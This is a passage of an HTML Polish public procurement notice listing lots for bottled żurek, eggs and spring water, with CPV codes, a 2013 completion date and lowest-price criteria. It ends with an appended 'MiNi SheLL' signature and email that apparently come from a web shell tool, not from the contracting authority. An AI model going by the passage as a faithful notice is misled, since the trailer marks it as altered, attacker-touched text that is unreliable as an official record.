Żurek w butelkach bez konserwantów	
Szt	
50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja ściółkowe L, świeże, klasa A, gat. I	
szt	
5000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Woda.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Woda źródlana, niegazowana, butle o pojemności ok. 19 litrów hermetyczne  zamykana	szt.	90.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 41.11.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com